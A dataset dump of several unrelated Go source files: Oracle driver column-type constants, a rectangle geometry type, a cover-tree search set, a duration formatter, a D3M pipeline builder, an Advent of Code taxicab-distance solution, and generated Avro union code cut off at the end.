// OraI32 defines a sql select column as a nullable Go ora.Int32.
OraI32
// OraI16 defines a sql select column as a nullable Go ora.Int16.
OraI16
// OraI8 defines a sql select column as a nullable Go ora.Int8.
OraI8
// OraU64 defines a sql select column as a nullable Go ora.Uint64.
OraU64
// OraU32 defines a sql select column as a nullable Go ora.Uint32.
OraU32
// OraU16 defines a sql select column as a nullable Go ora.Uint16.
OraU16
// OraU8 defines a sql select column as a nullable Go ora.Uint8.
OraU8
// OraF64 defines a sql select column as a nullable Go ora.Float64.
OraF64
// OraF32 defines a sql select column as a nullable Go ora.Float32.
OraF32
// T defines a sql select column as a Go time.Time.
T
// OraT defines a sql select column as a nullable Go ora.Time.
OraT
// S defines a sql select column as a Go string.
S
// OraS defines a sql select column as a nullable Go ora.String.
OraS
// B defines a sql select column as a Go bool.
B
// OraB defines a sql select column as a nullable Go ora.Bool.
OraB
// Bin defines a sql select column or bind parmeter as a Go byte slice.
Bin
// OraBin defines a sql select column as a nullable Go ora.Binary.
OraBin
// N defines a sql select column as a Go string for number.
N
// OraN defines a sql select column as a nullable Go string for number.
OraN
// L defins an sql select column as an ora.Lob.
L
)
func GctName(gct GoColumnType) string {
switch gct {
case D:
return "D"
case I64:
return "I64"
case I32:
return "I32"
case I16:
return "I16"
case I8:
return "I8"
case U64:
return "U64"
case U32:
return "U32"
case U16:
return "U16"
case U8:
return "U8"
case F64:
return "F64"
case F32:
return "F32"
case OraI64:
return "OraI64"
case OraI32:
return "OraI32"
case OraI16:
return "OraI16"
case OraI8:
return "OraI8"
case OraU64:
return "OraU64"
case OraU32:
return "OraU32"
case OraU16:
return "OraU16"
case OraU8:
return "OraU8"
case OraF64:
return "OraF64"
case OraF32:
return "OraF32"
case T:
return "T"
case OraT:
return "OraT"
case S:
return "S"
case OraS:
return "OraS"
case B:
return "B"
case OraB:
return "OraB"
case Bin:
return "Bin"
case OraBin:
return "OraBin"
case N:
return "N"
case OraN:
return "OraN"
case L:
return "L"
}
return ""
}
func (gct GoColumnType) String() string {
return GctName(gct)
}
// bind pool indexes
const (
bndIdxInt64 int = iota
bndIdxInt32
bndIdxInt16
bndIdxInt8
bndIdxUint64
bndIdxUint32
bndIdxUint16
bndIdxUint8
bndIdxFloat64
bndIdxFloat32
bndIdxNumString
bndIdxOCINum
bndIdxInt64Ptr
bndIdxInt32Ptr
bndIdxInt16Ptr
bndIdxInt8Ptr
bndIdxUint64Ptr
bndIdxUint32Ptr
bndIdxUint16Ptr
bndIdxUint8Ptr
bndIdxFloat64Ptr
bndIdxFloat32Ptr
bndIdxNumStringPtr
bndIdxOCINumPtr
bndIdxInt64Slice
bndIdxInt32Slice
bndIdxInt16Slice
bndIdxInt8Slice
bndIdxUint64Slice
bndIdxUint32Slice
bndIdxUint16Slice
bndIdxUint8Slice
bndIdxFloat64Slice
bndIdxFloat32Slice
bndIdxNumStringSlice
bndIdxOCINumSlice
bndIdxTime
bndIdxTimePtr
bndIdxTimeSlice
bndIdxDate
bndIdxDatePtr
bndIdxDateSlice
bndIdxString
bndIdxStringPtr
bndIdxStringSlice
bndIdxBool
bndIdxBoolPtr
bndIdxBoolSlice
bndIdxBin
bndIdxBinSlice
bndIdxLob
bndIdxLobPtr
bndIdxLobSlice
bndIdxIntervalYM
bndIdxIntervalYMSlice
bndIdxIntervalDS
bndIdxIntervalDSSlice
bndIdxBfile
bndIdxRset
bndIdxNil
)
// define pool indexes
const (
defIdxInt64 int = iota
defIdxInt32
defIdxInt16
defIdxInt8
defIdxUint64
defIdxUint32
defIdxUint16
defIdxUint8
defIdxFloat64
defIdxFloat32
defIdxOCINum
defIdxTime
defIdxDate
defIdxString
defIdxNumString
defIdxBool
defIdxLob
defIdxRaw
defIdxLongRaw
defIdxIntervalYM
defIdxIntervalDS
defIdxBfile
defIdxRowid
defIdxRset
) | vendor/gopkg.in/rana/ora.v4/const.go | 0.538983 | 0.566258 | const.go | starcoder |
package geom
import (
"fmt"
"math"
)
// A Rectangle represents a rectangle using 2 corner points.
// Only rectangles aligned with the coordinate axes can be represented.
type Rectangle struct {
Min, Max Point
}
// RectWithSideLengths creates a new rectangle with the given size.
func RectWithSideLengths(p Point) Rectangle {
return Rectangle{Max: p}
}
// SquareWithSideLen creates a new square with the given size.
func SquareWithSideLen(side float64) Rectangle {
return RectWithSideLengths(Pt(side, side))
}
// RectContainingPoints finds the smallest rectangle containing all given
// points.
func RectContainingPoints(points ...Point) Rectangle {
if len(points) == 0 {
return Rectangle{}
}
return Rectangle{Min: points[0], Max: points[0]}.
GrowToContain(points[1:]...)
}
func (r Rectangle) String() string {
return fmt.Sprintf("Rect(%v / %v)", r.Min, r.Max)
}
// Width returns the width of the rectangle.
func (r Rectangle) Width() float64 {
return r.Max.X - r.Min.X
}
// Height returns the height of the rectangle).
func (r Rectangle) Height() float64 {
return r.Max.Y - r.Min.Y
}
// MinSide return the length of the smaller side.
func (r Rectangle) MinSide() float64 {
return math.Min(r.Width(), r.Height())
}
// MaxSide returns the length of the bigger side.
func (r Rectangle) MaxSide() float64 {
return math.Max(r.Width(), r.Height())
}
// TopLeft returns the top left corner point
func (r Rectangle) TopLeft() Point {
return r.Min
}
// TopRight returns the top right corner point
func (r Rectangle) TopRight() Point {
return Pt(r.Max.X, r.Min.Y)
}
// BottomRight returns the bottom right corner point
func (r Rectangle) BottomRight() Point {
return r.Max
}
// BottomLeft returns the bottom left corner point
func (r Rectangle) BottomLeft() Point {
return Pt(r.Min.X, r.Max.Y)
}
// Vertices returns a slice containing all four corner points
// The order is clockwise starting with the top left corner.
func (r Rectangle) Vertices() []Point {
return []Point{r.TopLeft(), r.TopRight(), r.BottomRight(), r.BottomLeft()}
}
// Center returns the center of the rectangle.
func (r Rectangle) Center() Point {
return r.Min.
Add(r.Max).
Mul(.5)
}
// GrowToContain returns a new rectangle expanded to contain the given points.
// If the rectangle already contains the points, a copy is returned.
func (r Rectangle) GrowToContain(points ...Point) Rectangle {
for _, p := range points {
x, y := p.XY()
if x < r.Min.X {
r.Min.X = x
}
if y < r.Min.Y {
r.Min.Y = y
}
if x > r.Max.X {
r.Max.X = x
}
if y > r.Max.Y {
r.Max.Y = y
}
}
return r
}
// Translate moves the rectangle around by the given point.
func (r Rectangle) Translate(p Point) Rectangle {
return Rectangle{
Min: r.Min.Add(p),
Max: r.Max.Add(p),
}
}
// Scale scales the rectangle from the origin.
func (r Rectangle) Scale(factor float64) Rectangle {
return Rectangle{
Min: r.Min.Mul(factor),
Max: r.Max.Mul(factor),
}
}
// ScaleFrom scales the rectangle from a given point.
func (r Rectangle) ScaleFrom(factor float64, origin Point) Rectangle {
return r.
Translate(origin.Neg()).
Scale(factor).
Translate(origin)
}
// ScaleFromCenter scales the rectangle from the center.
func (r Rectangle) ScaleFromCenter(factor float64) Rectangle {
return r.ScaleFrom(factor, r.Center())
}
// RotateAround returns the four vertices of the rectangle after a
// counterclockwise rotation around the given point.
func (r Rectangle) RotateAround(angle float64, origin Point) Polygon {
return Poly(
r.TopLeft().RotateAround(angle, origin),
r.TopRight().RotateAround(angle, origin),
r.BottomRight().RotateAround(angle, origin),
r.BottomLeft().RotateAround(angle, origin),
)
}
// RotateAroundCenter returns the four vertices of the rectangle after a
// counterclockwise rotation around the center.
func (r Rectangle) RotateAroundCenter(angle float64) Polygon {
return r.RotateAround(angle, r.Center())
}
// InnerCenterSquare returns a new square which fits inside of the rectangle.
func (r Rectangle) InnerCenterSquare() Rectangle {
w, h := r.Width(), r.Height()
s := w
if w > h {
s = h
}
halfS := float64(s) / 2
diag := Pt(halfS, halfS)
c := r.Center()
return Rectangle{
Min: c.Sub(diag),
Max: c.Add(diag),
}
} | pkg/geom/rect.go | 0.949926 | 0.798187 | rect.go | starcoder |
package covertree
import "math"
type coverSet struct {
layers []coverSetLayer
totalItemCount int
visibleItemCount int
}
func coverSetWithItems(items []interface{}, parent interface{}, query interface{}, distanceFunc DistanceFunc, loadChildren func(...interface{}) ([]LevelsWithItems, error)) (coverSet, error) {
var cs coverSet
if len(items) > 0 {
children, err := loadChildren(items...)
if err != nil {
return cs, err
}
itemsForLayer := make([]itemWithChildren, len(items))
for i, item := range items {
distance := distanceFunc(item, query)
itemsForLayer[i] = itemWithChildren{withDistance: ItemWithDistance{item, distance}, parent: parent, children: children[i]}
}
cs.addLayer(makeCoverSetLayer(itemsForLayer))
}
return cs, nil
}
func (cs *coverSet) addLayer(layer coverSetLayer) {
cs.layers = append(cs.layers, layer)
cs.totalItemCount += len(layer)
cs.visibleItemCount += len(layer)
}
func (cs coverSet) atBottom() bool {
for _, layer := range cs.layers {
for _, csItem := range layer {
if csItem.hasChildren() {
return false
}
}
}
return true
}
func (cs coverSet) child(query interface{}, distThreshold float64, childLevel int, distanceBetween DistanceFunc, loadChildren func(...interface{}) ([]LevelsWithItems, error)) (childCoverSet coverSet, parentWithinThreshold interface{}, err error) {
childCoverSet = coverSet{
layers: cs.layers,
totalItemCount: cs.totalItemCount,
visibleItemCount: 0,
}
var promotedChildren []itemWithChildren
var minParentDistance = math.MaxFloat64
for i := range cs.layers {
layer := cs.layers[i].constrainedToDistance(distThreshold)
childCoverSet.layers[i] = layer
childCoverSet.visibleItemCount += len(layer)
if len(layer) > 0 && layer[0].withDistance.Distance < minParentDistance {
parentWithinThreshold = layer[0].withDistance.Item
minParentDistance = layer[0].withDistance.Distance
}
for _, csItem := range layer {
for _, childItem := range csItem.takeChildrenAt(childLevel) {
if childDist := distanceBetween(childItem, query); childDist <= distThreshold {
promotedChild := itemWithChildren{withDistance: ItemWithDistance{childItem, childDist}, parent: csItem.withDistance.Item}
promotedChildren = append(promotedChildren, promotedChild)
}
}
}
}
if len(promotedChildren) > 0 {
children := make([]interface{}, len(promotedChildren))
for i := range promotedChildren {
children[i] = promotedChildren[i].withDistance.Item
}
grandchildren, err := loadChildren(children...)
if err != nil {
return childCoverSet, nil, err
}
for i := range promotedChildren {
promotedChildren[i].children = grandchildren[i]
}
childCoverSet.addLayer(makeCoverSetLayer(promotedChildren))
}
return
}
func (cs coverSet) bound(maxItems int, maxDist float64) float64 {
var count = 0
var minIndices = make([]int, len(cs.layers))
var boundDistance = maxDist
for count < maxItems {
var minLayerIndex = -1
for layerIndex, layer := range cs.layers {
minIndex := minIndices[layerIndex]
if minIndex >= len(layer) {
continue
}
itemDistance := layer[minIndex].withDistance.Distance
if minLayerIndex == -1 || itemDistance < boundDistance {
minLayerIndex = layerIndex
boundDistance = itemDistance
}
}
if minLayerIndex == -1 || boundDistance > maxDist {
break
}
count++
minIndices[minLayerIndex]++
}
if count == maxItems {
return boundDistance
}
return maxDist
}
func (cs coverSet) closest(maxItems int, maxDist float64) []ItemWithDistance {
var results []ItemWithDistance
var minIndices = make([]int, len(cs.layers))
for len(results) < maxItems {
var minItem *ItemWithDistance
var minLayerIndex = -1
for layerIndex, layer := range cs.layers {
minIndex := minIndices[layerIndex]
if minIndex >= len(layer) {
continue
}
item := &layer[minIndex].withDistance
if minLayerIndex == -1 || item.Distance < minItem.Distance {
minLayerIndex = layerIndex
minItem = item
}
}
if minLayerIndex == -1 || minItem.Distance > maxDist {
break
}
results = append(results, *minItem)
minIndices[minLayerIndex]++
}
return results
} | coverset.go | 0.550124 | 0.410402 | coverset.go | starcoder |
package args
import (
"fmt"
"math"
"strings"
"time"
)
/*
NB! "µs" require 3 bytes, not 2 bytes, hence the difference with "ms" on a number of decimal positions
*/
func DurationFixedLen(d time.Duration, expectedLen int) string {
return durationFixedLen(d, d, expectedLen)
}
func durationFixedLen(d, base time.Duration, expectedLen int) string {
base, baseUnit := metricDurationBase(base)
if base < time.Minute {
return fmtMetric(d, base, baseUnit, expectedLen)
}
return fmtAboveSeconds(d, expectedLen)
}
func fmtMetric(d time.Duration, base time.Duration, baseUnit string, expectedLen int) string {
w := expectedLen - len(baseUnit)
v := float64(d) / float64(base)
if w < 1 {
w = 1
}
vRounded := math.Round(v)
if vRounded >= math.Pow10(w) {
return durationFixedLen(d, base*1000, expectedLen)
}
if w < 3 || vRounded >= math.Pow10(w-2) {
return fmt.Sprintf("%.0f%s", v, baseUnit)
}
b := strings.Builder{}
b.Grow(w + len(baseUnit))
vInt, vFrac := math.Modf(v)
b.WriteString(fmt.Sprintf("%d.", uint64(vInt)))
decimalCount := w - b.Len()
decimals := uint64(vFrac * math.Pow10(decimalCount))
b.WriteString(fmt.Sprintf("%0*d", decimalCount, decimals))
b.WriteString(baseUnit)
return b.String()
}
func metricDurationBase(d time.Duration) (time.Duration, string) {
if d < 10*time.Minute {
switch {
case d > 500*time.Millisecond:
return time.Second, "s"
case d > 500*time.Microsecond:
return time.Millisecond, "ms"
default:
return time.Microsecond, "µs"
}
}
return time.Minute, "m"
}
func fmtAboveSeconds(d time.Duration, expectedLen int) string {
minutes := d / time.Minute
seconds := (d - minutes*time.Minute) / time.Second
if minutes < 600 {
return fmtPortions(uint64(seconds), "s", uint64(minutes), "m", expectedLen)
}
hours := minutes / 60
minutes -= hours * 60
return fmtPortions(uint64(minutes), "m", uint64(hours), "h", expectedLen)
}
func fmtPortions(valueLo uint64, unitLo string, valueHi uint64, unitHi string, expectedLen int) string {
if valueLo > 59 {
panic("illegal value")
}
switch {
case valueHi > 0:
break
case expectedLen-len(unitLo) < 2:
if valueLo > 9 {
if valueLo > 30 {
valueLo = 0
valueHi++
}
break
}
fallthrough
default:
return fmt.Sprintf("%d%s", valueLo, unitLo)
}
vHi := fmt.Sprintf("%d%s", valueHi, unitHi)
if len(vHi)+2+len(unitLo) > expectedLen {
if valueLo > 30 {
return fmt.Sprintf("%d%s", valueHi+1, unitHi)
}
return vHi
}
return vHi + fmt.Sprintf("%02d%s", valueLo, unitLo)
}
func BitCountToMaxDecimalCount(bitLen int) int {
if bitLen == 0 {
return 0
}
const k = 3321928 // 3.3219280948873623478703194294894 = Ln(10) / Ln(2)
return int(1 + (uint64(bitLen-1)*1000000)/k)
} | network/consensus/common/args/fmt_duration.go | 0.791015 | 0.409014 | fmt_duration.go | starcoder |
package description
// Provides an interface to assemble a D3M pipeline DAG as a protobuf PipelineDescription. This created
// description can be passed to a TA2 system for execution and inference. The pipeline description is
// covered in detail at https://gitlab.com/datadrivendiscovery/metalearning#pipeline with example JSON
// pipeline definitions found in that same repository.
import (
"fmt"
"github.com/pkg/errors"
"github.com/uncharted-distil/distil-compute/pipeline"
)
// PipelineBuilder compiles a pipeline DAG into a protobuf pipeline description that can
// be passed to a downstream TA2 for inference (optional) and execution.
type PipelineBuilder struct {
name string
description string
inputs []string
outputs []DataRef
steps []Step
compiled bool
}
// NewPipelineBuilder creates a new pipeline builder instance. All of the source nodes in the pipeline
// DAG need to be passed in to the builder via the sources argument, which is variadic.
func NewPipelineBuilder(name string, description string, inputs []string, outputs []DataRef, steps []Step) *PipelineBuilder {
builder := &PipelineBuilder{
name: name,
description: description,
inputs: inputs,
outputs: outputs,
steps: steps,
}
return builder
}
// GetSteps returns compiled steps.
func (p *PipelineBuilder) GetSteps() []Step {
return p.steps
}
// Compile creates the protobuf pipeline description from the step graph. It can only be
// called once.
func (p *PipelineBuilder) Compile() (*pipeline.PipelineDescription, error) {
if p.compiled {
return nil, errors.New("compile failed: pipeline already compiled")
}
if len(p.steps) == 0 {
return nil, errors.New("compile failed: pipeline requires at least 1 step")
}
// Set the inputs
pipelineInputs := []*pipeline.PipelineDescriptionInput{}
for _, input := range p.inputs {
pipelineInputs = append(pipelineInputs, &pipeline.PipelineDescriptionInput{
Name: input,
})
}
// Set the outputs
pipelineOutputs := []*pipeline.PipelineDescriptionOutput{}
for i, output := range p.outputs {
output := &pipeline.PipelineDescriptionOutput{
Name: fmt.Sprintf("%s %d", pipelineOutputsName, i),
Data: output.RefString(),
}
pipelineOutputs = append(pipelineOutputs, output)
}
// Compile the build steps
compileResults := []*pipeline.PipelineDescriptionStep{}
for _, step := range p.steps {
compileResult, err := step.BuildDescriptionStep()
if err != nil {
return nil, err
}
compileResults = append(compileResults, compileResult)
}
pipelineDesc := &pipeline.PipelineDescription{
Name: p.name,
Description: p.description,
Steps: compileResults,
Inputs: pipelineInputs,
Outputs: pipelineOutputs,
}
// mark the entire pipeline as compiled so it can't be compiled again
p.compiled = true
return pipelineDesc, nil
} | primitive/compute/description/builder.go | 0.84228 | 0.476884 | builder.go | starcoder |
package main
import (
"bufio"
"errors"
"fmt"
"math"
"os"
"strconv"
"strings"
)
// For debug output: export DEBUG=1
// Type Step represents a step from the input file, which contains a direction
// (left or right) and the number of blocks to travel.
type Step struct {
Direction Direction
Steps int
}
// Type Direction represents either Left or Right.
type Direction int
// Direction constants.
const (
Left Direction = iota
Right
)
// Type Facing represents what direction we're facing.
type Facing int
// Facing constants.
const (
North Facing = iota
East
South
West
)
// Type Coordinate logs an X and Y pair for places we've been.
type Coordinate struct {
X int
Y int
}
// Type Visited stores a map of coordinates we've been to.
type Visited map[Coordinate]bool
func main() {
if len(os.Args) < 2 {
fmt.Println("Usage: main.go <input file>")
os.Exit(1)
}
// Get the list of steps to follow.
steps, err := ParseInput(os.Args[1])
if err != nil {
panic(err)
}
// Track our offsets starting at 0,0 and facing north to find where the
// directions lead to.
x, y, facing := 0, 0, North
// Also keep track of where we've been. The Easter Bunny HQ is at the first
// location that we visit twice.
visited := &Visited{}
visited.Visit(Coordinate{0, 0})
// Follow the steps.
for _, step := range steps {
// Turn first.
facing.Turn(step.Direction)
// Print output for debugging.
Debug("Step: %v - Now Facing: %v - Coords: (%d,%d)\n", step, facing, x, y)
done := visited.Travel(&x, &y, facing, step.Steps)
if done {
break
}
}
// And our verdict is...
distance := int(math.Abs(float64(x)) + math.Abs(float64(y)))
fmt.Printf("The Easter Bunny HQ is %d blocks away.\n", distance)
}
// Turn calculates what direction we're facing.
func (f *Facing) Turn(direction Direction) {
// Rotate our direction of facing first.
if direction == Right {
*f += 1
} else {
*f -= 1
}
// And bounds check it.
if *f < North {
*f = West
} else if *f > West {
*f = North
}
}
// Travel moves our position along a vector and returns true if we've stepped
// over the same position twice.
func (v *Visited) Travel(x, y *int, facing Facing, distance int) bool {
// Loop for the distance desired.
for i := 0; i < distance; i++ {
// Move our position along the vector.
if facing == North {
*y += 1
} else if facing == East {
*x += 1
} else if facing == South {
*y -= 1
} else if facing == West {
*x -= 1
}
// The coordinate we're currently looking at.
coord := Coordinate{*x, *y}
// Mark it as visited. This also tells us whether we stepped over the
// spot twice, so we can return true if so.
if v.Visit(coord) {
return true
}
}
return false
}
// Visit marks a spot we've visited and returns true if it's a duplicate spot.
func (v *Visited) Visit(c Coordinate) bool {
Debug("Visit coord: %v\n", c)
if _, ok := (*v)[c]; ok {
fmt.Printf("We stepped back over our tracks at %v!\n", c)
return true
}
(*v)[c] = true
return false
}
// ParseInput parses the input text file and returns an array of Steps.
func ParseInput(file string) ([]Step, error) {
fh, err := os.Open(file)
if err != nil {
return nil, err
}
defer fh.Close()
// Make a line scanner.
scanner := bufio.NewScanner(fh)
scanner.Split(bufio.ScanLines)
// Make the buffer of steps.
steps := []Step{}
for scanner.Scan() {
line := strings.TrimSpace(scanner.Text())
if len(line) == 0 {
continue
}
// Look for steps. Steps look like "R5" or "L2": a direction and a
// number of blocks to travel that direction.
for _, step := range strings.Split(line, ",") {
step = strings.TrimSpace(step)
direction := step[0]
blocks, err := strconv.Atoi(step[1:])
if err != nil {
return nil, err
}
if direction == 'R' {
steps = append(steps, Step{Right, blocks})
} else if direction == 'L' {
steps = append(steps, Step{Left, blocks})
} else {
return nil, errors.New(fmt.Sprintf("Found an invalid step entry: %v", step))
}
}
}
return steps, nil
}
// Debug prints a debug message.
func Debug(template string, a ...interface{}) {
if os.Getenv("DEBUG") != "" {
fmt.Printf(template, a...)
}
} | day01/main.go | 0.673943 | 0.418222 | main.go | starcoder |
* SOURCE:
* Record.avsc
*/
package dtsavro
import (
"encoding/json"
"fmt"
"io"
"github.com/actgardner/gogen-avro/v7/vm"
"github.com/actgardner/gogen-avro/v7/vm/types"
)
type UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum int
const (
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumInteger UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 1
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumCharacter UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 2
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumDecimal UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 3
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumFloat UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 4
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTimestamp UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 5
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumDateTime UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 6
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTimestampWithTimeZone UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 7
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumBinaryGeometry UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 8
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTextGeometry UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 9
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumBinaryObject UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 10
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTextObject UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 11
UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumEmptyObject UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum = 12
)
type UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject struct {
Null *types.NullVal
Integer *Integer
Character *Character
Decimal *Decimal
Float *Float
Timestamp *Timestamp
DateTime *DateTime
TimestampWithTimeZone *TimestampWithTimeZone
BinaryGeometry *BinaryGeometry
TextGeometry *TextGeometry
BinaryObject *BinaryObject
TextObject *TextObject
EmptyObject EmptyObject
UnionType UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnum
}
func writeUnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject(r *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject, w io.Writer) error {
if r == nil {
err := vm.WriteLong(0, w)
return err
}
err := vm.WriteLong(int64(r.UnionType), w)
if err != nil {
return err
}
switch r.UnionType {
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumInteger:
return writeInteger(r.Integer, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumCharacter:
return writeCharacter(r.Character, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumDecimal:
return writeDecimal(r.Decimal, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumFloat:
return writeFloat(r.Float, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTimestamp:
return writeTimestamp(r.Timestamp, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumDateTime:
return writeDateTime(r.DateTime, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTimestampWithTimeZone:
return writeTimestampWithTimeZone(r.TimestampWithTimeZone, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumBinaryGeometry:
return writeBinaryGeometry(r.BinaryGeometry, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTextGeometry:
return writeTextGeometry(r.TextGeometry, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumBinaryObject:
return writeBinaryObject(r.BinaryObject, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumTextObject:
return writeTextObject(r.TextObject, w)
case UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObjectTypeEnumEmptyObject:
return writeEmptyObject(r.EmptyObject, w)
}
return fmt.Errorf("invalid value for *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject")
}
func NewUnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject() *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject {
return &UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject{}
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetBoolean(v bool) {
panic("Unsupported operation")
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetInt(v int32) {
panic("Unsupported operation")
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetFloat(v float32) {
panic("Unsupported operation")
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetDouble(v float64) {
panic("Unsupported operation")
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetBytes(v []byte) {
panic("Unsupported operation")
}
func (_ *UnionNullIntegerCharacterDecimalFloatTimestampDateTimeTimestampWithTimeZoneBinaryGeometryTextGeometryBinaryObjectTextObjectEmptyObject) SetString(v string) {
